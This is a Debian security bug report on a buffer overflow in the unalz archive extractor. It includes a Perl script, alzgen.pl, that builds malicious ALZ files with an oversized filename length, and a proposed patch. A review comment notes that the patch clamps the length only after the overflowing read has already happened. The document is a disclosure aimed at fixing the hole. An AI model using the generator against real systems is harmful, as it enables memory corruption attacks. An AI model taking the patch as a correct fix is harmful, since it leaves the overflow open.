Subject: unalz: buffer overflow when extracting archives
Package: unalz
Version: 0.52-1
Severity: grave
Justification: user security hole
Tags: security patch sarge etch sid
Hello,

I have found a buffer overflow security vulnerability in unalz. It occurs when it extracts malicious ALZ archives. I have attached the archives oflow333.alz (for sarge) and oflow1621.alz (for testing and unstable), as well as the program alzgen.pl that generated them and a patch that corrects this issue. It is also possible to upgrade to the latest upstream version 0.53, which also corrects it.

// Ulf Härnhammar, Debian Security Audit Project

-- System Information:
Debian Release: testing/unstable
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12-1-686
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)

Versions of packages unalz depends on:
ii  libc6       2.3.5-8    GNU C Library: Shared libraries an
ii  libgcc1     1:4.0.2-2  GCC support library
ii  libstdc++6  4.0.2-2    The GNU Standard C++ Library v3

unalz recommends no packages.

-- no debconf information
Attachment: oflow333.alz (binary data)
Attachment: oflow1621.alz (binary data)
#!/usr/bin/perl --
# alzgen
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.
#
# Writes a minimal ALZ local file header whose filename length field is
# set to <length>, followed by that many 'U' bytes as the filename.
use strict;
use warnings;

die "usage: $0 <length> <filename>\n" unless @ARGV == 2;
my $len   = shift;
my $lenhi = int($len / 256);        # high byte of the 16-bit little-endian length
my $lenlo = $len - ($lenhi * 256);  # low byte
my $file  = shift;
open(OUT, ">$file") or die "can't open file!\n";
binmode OUT;                        # raw bytes, no newline translation
print OUT "\x42\x4c\x5a\x01" .      # SIG_LOCAL_FILE_HEADER
          chr($lenlo) . chr($lenhi) . # filename length
          "\x00" x 7 .              # remaining header fields, zeroed
          'U' x $len;               # filename body
close OUT or die "can't close file!?!?\n";
--- UnAlz.cpp.old 2004-11-25 07:23:36.000000000 +0100
+++ UnAlz.cpp 2005-11-20 01:04:23.000000000 +0100
@@ -359,6 +359,8 @@
return FALSE;
}
FRead(zipHeader.fileName, zipHeader.head.fileNameLength);
+ if(zipHeader.head.fileNameLength > MAX_PATH - 5)
+ zipHeader.head.fileNameLength = MAX_PATH - 5;
zipHeader.fileName[zipHeader.head.fileNameLength] = (CHAR)NULL;
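Review bot: the clamp is applied after `FRead(zipHeader.fileName, zipHeader.head.fileNameLength);` has already copied fileNameLength bytes into fileName, so as far as these lines show the read itself can still run past the end of the buffer; the length should be checked before the FRead call, and, consistent with the `return FALSE;` path just above, an oversized value is better rejected than silently truncated. A short comment explaining the `- 5` margin (or a named constant) would also help the next reader.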